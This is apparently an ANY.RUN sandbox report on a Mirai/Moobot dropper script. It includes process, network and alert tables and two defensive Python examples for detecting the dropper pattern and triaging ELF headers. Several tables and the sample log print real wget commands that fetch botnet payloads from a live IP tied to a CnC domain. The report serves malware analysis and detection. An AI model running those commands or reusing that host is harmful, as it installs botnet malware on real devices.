File name:

wget.sh

Full analysis: https://app.any.run/tasks/6af66d51-54a5-46ce-a502-445e72a5dccb
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices controlled by a single operator or group, usually without the owners' knowledge or consent. The devices are used for distributed denial-of-service (DDoS) attacks, spam campaigns and data theft. Botnet malware is the software that infects a device and enrolls it in the botnet. Mirai-family bots such as this sample target Linux-based embedded and IoT devices, which is why the dropper fetches a payload for each of several CPU architectures rather than a single binary.

Analysis date: May 15, 2025, 10:28:46
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
moobot
Indicators:
MIME: text/plain
File info: ASCII text
MD5:

1306A3632D7EA57B423C515D318503F3

SHA1:

6B127FE5478ED02C096586AE330F0C7366F93C6B

SHA256:

F830A78B46BEA7141D7D5C8B4DC1E60B3B2D4C371820E209751CEFF33E35E0F3

SSDEEP:

12:nj+ReLq+2NIl5zA+b0LKj+COs++C+A/+iVcSE+EtaKA++j+qd/iA+qdtfAUn:nB2NI7gKrZYHVcPtBGd/xdhxn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for the user's acknowledgement. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Connects to the CnC server

      • x86_64 (PID: 39572)
      • x86 (PID: 39565)
    • MIRAI has been detected (SURICATA)

      • x86_64 (PID: 39572)
      • x86 (PID: 39565)
  • SUSPICIOUS

    • Executes commands using command-line interpreter

      • sudo (PID: 39497)
    • Modifies file or directory owner

      • sudo (PID: 39494)
    • Potential Corporate Privacy Violation

      • wget (PID: 39500)
      • wget (PID: 39508)
      • wget (PID: 39519)
      • wget (PID: 39523)
      • wget (PID: 39527)
      • wget (PID: 39546)
      • wget (PID: 39550)
      • wget (PID: 39554)
      • wget (PID: 39542)
      • wget (PID: 39567)
      • wget (PID: 39561)
    • Uses wget to download content

      • bash (PID: 39498)
    • Connects to the server without a host name

      • wget (PID: 39500)
      • wget (PID: 39508)
      • wget (PID: 39523)
      • wget (PID: 39519)
      • wget (PID: 39527)
      • wget (PID: 39554)
      • wget (PID: 39546)
      • wget (PID: 39550)
      • wget (PID: 39561)
      • wget (PID: 39558)
      • wget (PID: 39542)
      • wget (PID: 39567)
    • Executes the "rm" command to delete files or directories

      • bash (PID: 39498)
    • Contacting a server suspected of hosting a CnC

      • x86_64 (PID: 39572)
      • x86 (PID: 39565)
    • Connects to unusual port

      • x86_64 (PID: 39572)
      • x86 (PID: 39565)
  • INFO

    • Checks timezone

      • wget (PID: 39508)
      • wget (PID: 39500)
      • wget (PID: 39519)
      • wget (PID: 39523)
      • wget (PID: 39527)
      • wget (PID: 39542)
      • wget (PID: 39550)
      • wget (PID: 39554)
      • wget (PID: 39558)
      • wget (PID: 39561)
      • wget (PID: 39567)
      • wget (PID: 39546)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX in the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
289
Monitored processes
71
Malicious processes
7
Suspicious processes
7

Behavior graph

Nodes in display order (interactive-graph labels removed; "#MIRAI" marks the nodes that triggered the Mirai signature):

start, dash, sudo, chown, chmod, sudo, bash, locale-check, wget, systemctl, systemctl, systemctl, chmod, bash, wget, tracker-extract-3,
chmod, bash, wget (this triple repeated 9 times),
chmod, x86, x86 (#MIRAI), wget, x86, x86, chmod, x86_64, rm, x86_64 (#MIRAI), x86_64, x86_64, tracker-extract-3,
x86, x86_64, x86, x86_64, x86, x86_64, cron, dash, x86, x86_64, x86, x86_64, x86, x86_64, x86, x86_64

Process information

PIDs 39493-39497 are the ANY.RUN guest agent (parent any-guest-agent) staging the sample: it chowns /tmp/wget.sh to "user", marks it executable and launches it through sudo -iu user. The "Modifies file or directory owner" and "Executes commands using command-line interpreter" indicators on the sudo PIDs therefore describe the harness, not the sample; the sample's own activity begins at PID 39498 (bash). PIDs 39501-39502 (systemctl under snapd) are unrelated OS background activity. Integrity level is reported as UNKNOWN for every process.

PID    Parent           Path                   User  Exit  CMD
39493  any-guest-agent  /usr/bin/dash          root  0     /bin/sh -c "sudo chown user /tmp/wget\.sh && chmod +x /tmp/wget\.sh && DISPLAY=:0 sudo -iu user /tmp/wget\.sh "
39494  dash             /usr/bin/sudo          root  0     sudo chown user /tmp/wget.sh
39495  sudo             /usr/bin/chown         root  0     chown user /tmp/wget.sh
39496  dash             /usr/bin/chmod         root  0     chmod +x /tmp/wget.sh
39497  dash             /usr/bin/sudo          root  0     sudo -iu user /tmp/wget.sh
39498  sudo             /usr/bin/bash          user  0     -bash --login -c \/tmp\/wget\.sh
39499  bash             /usr/bin/locale-check  user  0     /usr/bin/locale-check C.UTF-8
39500  bash             /usr/bin/wget          user  0     wget http://103.37.61.126/arm
39501  snapd            /usr/bin/systemctl     root  0     systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service
39502  snapd            /usr/bin/systemctl     root  0     systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service
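The process chain above is the classic Mirai dropper loop: the bash instance started from /tmp/wget.sh fetches one architecture-named ELF payload after another from a bare-IP HTTP server and, per the indicators, chmods, executes and removes them. The Python below is an added detection example, not ANY.RUN code or anything taken from the sample: it reconstructs that pattern from process telemetry. The pid=/ppid=/cmd= log format is assumed; the wget command lines and the bash and x86 PIDs come from this report; the chmod, ./x86 and rm lines and the benign comparison line are constructed.

```python
"""Flag the Mirai-style multi-architecture dropper pattern in process
telemetry: a shell that fetches several CPU-architecture-named payloads
from one bare-IP HTTP server, marks them executable, runs them and then
removes them.

Added example for this report; not ANY.RUN code. The log format
(pid=/ppid=/cmd=) is assumed, and every line not in the report's process
table is constructed."""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlparse

# Payload names Mirai-family droppers conventionally use. The report shows
# arm..x86_64; the remaining names are common variants (an assumption here).
ARCH_NAMES = {"arm", "arm5", "arm6", "arm7", "m68k", "mips", "mpsl", "ppc",
              "sh4", "spc", "x86", "x86_64", "i586", "i686"}

LINE_RE = re.compile(r"pid=(\d+)\s+ppid=(\d+)\s+cmd=(.*)")
URL_RE = re.compile(r"https?://[^\s'\"]+")


def parse_events(lines):
    """Parse 'pid=N ppid=N cmd=...' lines into dicts; skip anything else."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append({"pid": int(m[1]), "ppid": int(m[2]), "cmd": m[3]})
    return events


def is_bare_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def basename(arg):
    return arg.rsplit("/", 1)[-1]


def analyze(events, min_archs=3):
    """Group children by parent shell and score each download host."""
    by_parent = defaultdict(list)
    for e in events:
        by_parent[e["ppid"]].append(e)

    findings = []
    for ppid, children in by_parent.items():
        downloads = defaultdict(set)          # host -> payload basenames
        plaintext, chmod_x, executed, removed = set(), set(), set(), set()
        for e in children:
            argv = e["cmd"].split()
            if not argv:
                continue
            prog = basename(argv[0])
            if prog in ("wget", "curl"):
                for url in URL_RE.findall(e["cmd"]):
                    u = urlparse(url)
                    name = basename(u.path)
                    if u.hostname and is_bare_ip(u.hostname) and name:
                        downloads[u.hostname].add(name)
                        if u.scheme == "http":
                            plaintext.add(u.hostname)
            elif prog == "chmod" and len(argv) > 2 and (
                    "x" in argv[1] or argv[1] in ("777", "755")):
                chmod_x.update(basename(a) for a in argv[2:])
            elif prog == "rm":
                removed.update(basename(a) for a in argv[1:] if not a.startswith("-"))
            elif prog in ARCH_NAMES:          # e.g. "./x86" or "/home/user/x86"
                executed.add(prog)

        for host, names in downloads.items():
            arch_hits = names & ARCH_NAMES
            reasons = []
            if len(arch_hits) >= min_archs:
                reasons.append(f"{len(arch_hits)} architecture-named payloads from {host}")
            if host in plaintext:
                reasons.append("plaintext HTTP from a bare IP")
            if names & chmod_x:
                reasons.append("chmod +x on a downloaded file")
            if names & executed:
                reasons.append("downloaded file executed")
            if names & removed:
                reasons.append("downloaded file deleted afterwards")
            # Fire on the fan-out alone, or on a download followed by execution.
            if len(arch_hits) >= min_archs or names & executed:
                findings.append({"shell_pid": ppid, "host": host,
                                 "payloads": sorted(names), "reasons": reasons})
    return findings


# Constructed telemetry: bash PID, wget command lines and the x86 PID are from
# the report; chmod, ./x86 argv, rm and the benign line are constructed.
SAMPLE_LOG = [
    "pid=39498 ppid=39497 cmd=-bash --login -c /tmp/wget.sh",
    "pid=39500 ppid=39498 cmd=wget http://103.37.61.126/arm",
    "pid=39508 ppid=39498 cmd=wget http://103.37.61.126/arm5",
    "pid=39519 ppid=39498 cmd=wget http://103.37.61.126/arm6",
    "pid=39523 ppid=39498 cmd=wget http://103.37.61.126/arm7",
    "pid=39527 ppid=39498 cmd=wget http://103.37.61.126/m68k",
    "pid=39542 ppid=39498 cmd=wget http://103.37.61.126/mips",
    "pid=39546 ppid=39498 cmd=wget http://103.37.61.126/mpsl",
    "pid=39550 ppid=39498 cmd=wget http://103.37.61.126/ppc",
    "pid=39554 ppid=39498 cmd=wget http://103.37.61.126/sh4",
    "pid=39561 ppid=39498 cmd=wget http://103.37.61.126/x86",
    "pid=39563 ppid=39498 cmd=chmod +x x86",
    "pid=39565 ppid=39498 cmd=./x86",
    "pid=39570 ppid=39498 cmd=rm -rf x86",
    # Benign admin download in another shell: named host over TLS, not flagged.
    "pid=41000 ppid=40990 cmd=wget https://deb.debian.org/debian/pool/main/c/curl/curl_8.5.0.orig.tar.gz",
]


def report_findings():
    return analyze(parse_events(SAMPLE_LOG))


if __name__ == "__main__":
    for f in report_findings():
        print(f"shell {f['shell_pid']} <- {f['host']}: {', '.join(f['reasons'])}")
```

The grouping key is the parent shell rather than the individual wget, because a single download of an ELF over HTTP is common in build pipelines; it is the fan-out to many architectures from one bare IP, followed by chmod and execution inside the same shell, that makes the sequence a dropper.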
Executable files
0
Suspicious files
11
Text files
0
Unknown types
0

Dropped files

PID    Process  Filename           Type
39500  wget     /home/user/arm     binary
39508  wget     /home/user/arm5    binary
39519  wget     /home/user/arm6    binary
39523  wget     /home/user/arm7    binary
39527  wget     /home/user/m68k    binary
39542  wget     /home/user/mips    binary
39546  wget     /home/user/mpsl    binary
39550  wget     /home/user/ppc     binary
39554  wget     /home/user/sh4     binary
39561  wget     /home/user/x86     binary

MD5 and SHA256 of the dropped files are not populated in the report.
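The table lists ten architecture-named binaries with no hashes or content, so the first check a practitioner runs on the recovered files is whether each one really is an ELF image for the CPU its name claims. The Python below is an added example, not ANY.RUN code: it parses the ELF identification bytes and e_machine and compares them with the dropper's naming convention (arm5/arm6/arm7 are all EM_ARM; "mips" is big-endian MIPS and "mpsl" little-endian). Because the real payloads are not on this page, the inputs are constructed minimal ELF headers, including a deliberately mislabelled one and a non-ELF response, to show the mismatch and not-elf verdicts.

```python
"""Triage the payloads a Mirai-style dropper fetched by reading each file's
ELF identification bytes and e_machine, so the real CPU target can be checked
against the architecture name in its URL or filename (arm, mips, mpsl, ...).

Added example for this report; not ANY.RUN code. The report leaves the
dropped files' hashes blank and their contents are not available here, so the
byte strings below are constructed minimal ELF headers, not the real payloads."""
import struct
from typing import Optional

EI_CLASS_NAMES = {1: "ELF32", 2: "ELF64"}
EI_DATA_NAMES = {1: "LSB", 2: "MSB"}

# e_machine values from the ELF specification for the targets a
# multi-architecture dropper typically serves.
E_MACHINE = {3: "x86", 4: "m68k", 8: "mips", 20: "ppc", 40: "arm",
             42: "sh4", 62: "x86_64", 183: "aarch64"}


def identify_elf(data: bytes) -> Optional[dict]:
    """Return class, byte order, machine and e_type, or None if not an ELF."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    ei_class, ei_data = data[4], data[5]
    if ei_class not in EI_CLASS_NAMES or ei_data not in EI_DATA_NAMES:
        return None
    endian = "<" if ei_data == 1 else ">"
    # e_ident is 16 bytes; e_type and e_machine follow as two 16-bit fields.
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    machine = E_MACHINE.get(e_machine, f"unknown({e_machine})")
    # Dropper naming convention: "mips" is big-endian MIPS, "mpsl" little-endian.
    if e_machine == 8:
        machine = "mips" if ei_data == 2 else "mpsl"
    return {"class": EI_CLASS_NAMES[ei_class], "endian": EI_DATA_NAMES[ei_data],
            "machine": machine, "e_type": e_type}


def expected_machine(path: str) -> str:
    """Machine identify_elf() should report for a payload with this name."""
    name = path.rsplit("/", 1)[-1]
    return "arm" if name.startswith("arm") else name   # arm5/arm6/arm7 are all EM_ARM


def make_header(ei_class: int, ei_data: int, e_machine: int) -> bytes:
    """Construct a header-only ELF image (ET_EXEC, EV_CURRENT) for the demo."""
    endian = "<" if ei_data == 1 else ">"
    e_ident = b"\x7fELF" + bytes([ei_class, ei_data, 1, 0]) + b"\x00" * 8
    return e_ident + struct.pack(endian + "HHI", 2, e_machine, 1)


def triage(files: dict) -> dict:
    """Map each path to (verdict, machine): match, mismatch or not-elf."""
    results = {}
    for path, data in files.items():
        info = identify_elf(data)
        if info is None:
            results[path] = ("not-elf", None)
        elif info["machine"] == expected_machine(path):
            results[path] = ("match", info["machine"])
        else:
            results[path] = ("mismatch", info["machine"])
    return results


# Constructed samples using filenames from the report's dropped-files table.
SAMPLES = {
    "/home/user/arm7": make_header(1, 1, 40),
    "/home/user/mips": make_header(1, 2, 8),
    "/home/user/mpsl": make_header(1, 1, 8),
    "/home/user/sh4": make_header(1, 1, 42),
    "/home/user/x86_64": make_header(2, 1, 62),
    "/home/user/ppc": make_header(1, 2, 4),                 # constructed: m68k image served under the ppc name
    "/home/user/x86": b"<html><body>404</body></html>",     # constructed: server answered with a page, not a binary
}

if __name__ == "__main__":
    for path, (verdict, machine) in triage(SAMPLES).items():
        print(f"{path:22s} {verdict:9s} {machine}")
```

A "not-elf" verdict on a payload the dropper still tries to chmod and execute is common when the hosting server has already been cleaned up, and a "mismatch" is worth noting because Mirai droppers frequently serve whatever they have under every name; in both cases the file's own header, not its URL, tells you which architectures were actually delivered.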
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
34
DNS requests
28
Threats
76

HTTP requests

Type and Size are not populated for any request. Rows without a PID are host background traffic (Ubuntu connectivity check).

PID    Process  Method  HTTP Code  IP                 URL                                    CN       Reputation
39519  wget     GET     200        103.37.61.126:80   http://103.37.61.126/arm6              unknown  unknown
39500  wget     GET     200        103.37.61.126:80   http://103.37.61.126/arm               unknown  unknown
39508  wget     GET     200        103.37.61.126:80   http://103.37.61.126/arm5              unknown  unknown
-      -        GET     204        91.189.91.98:80    http://connectivity-check.ubuntu.com/  unknown  whitelisted
-      -        GET     204        91.189.91.98:80    http://connectivity-check.ubuntu.com/  unknown  whitelisted
39523  wget     GET     200        103.37.61.126:80   http://103.37.61.126/arm7              unknown  unknown
39527  wget     GET     200        103.37.61.126:80   http://103.37.61.126/m68k              unknown  unknown
39554  wget     GET     200        103.37.61.126:80   http://103.37.61.126/sh4               unknown  unknown
39542  wget     GET     200        103.37.61.126:80   http://103.37.61.126/mips              unknown  unknown
39546  wget     GET     200        103.37.61.126:80   http://103.37.61.126/mpsl              unknown  unknown

Connections

PID    Process       IP                   Domain               ASN                      CN  Reputation
-      -             91.189.91.98:80      -                    Canonical Group Limited  US  unknown
484    avahi-daemon  224.0.0.251:5353     -                    -                        -   unknown
-      -             169.150.255.180:443  odrs.gnome.org       -                        GB  whitelisted
512    snapd         185.125.188.54:443   api.snapcraft.io     Canonical Group Limited  GB  whitelisted
39500  wget          103.37.61.126:80     nnmirai.duckdns.org  -                        -   malicious
39508  wget          103.37.61.126:80     nnmirai.duckdns.org  -                        -   malicious
39519  wget          103.37.61.126:80     nnmirai.duckdns.org  -                        -   malicious
39523  wget          103.37.61.126:80     nnmirai.duckdns.org  -                        -   malicious
39527  wget          103.37.61.126:80     nnmirai.duckdns.org  -                        -   malicious
39542  wget          103.37.61.126:80     nnmirai.duckdns.org  -                        -   malicious

The wget processes reach 103.37.61.126 by bare IP (no name lookup); the report ties that address to nnmirai.duckdns.org, the dynamic-DNS domain the executed x86 bot queries (see DNS requests and the duckdns Suricata alert under Threats). The payload host and the bot's CnC domain therefore share an address.

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.46
  • 2a00:1450:4001:808::200e
whitelisted
odrs.gnome.org
  • 169.150.255.180
  • 195.181.170.19
  • 212.102.56.178
  • 169.150.255.184
  • 207.211.211.26
  • 195.181.175.41
  • 37.19.194.80
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::19
whitelisted
api.snapcraft.io
  • 185.125.188.54
  • 185.125.188.57
  • 185.125.188.59
  • 185.125.188.58
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::42
whitelisted
6.100.168.192.in-addr.arpa
unknown
nnmirai.duckdns.org
  • 103.37.61.126
  • 160.250.180.181
malicious
connectivity-check.ubuntu.com
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::196
  • 2001:67c:1562::24
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::98
  • 2001:67c:1562::23
  • 2620:2d:4000:1::2a
whitelisted

Threats

PID    Process  Class                                  Message
39500  wget     Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
39508  wget     Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
39519  wget     Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
39523  wget     Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
39527  wget     Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
39542  wget     Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
39546  wget     Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
39550  wget     Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
39554  wget     Potential Corporate Privacy Violation  ET INFO Executable and linking format (ELF) file download Over HTTP
39565  x86      Potentially Bad Traffic                ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
No debug info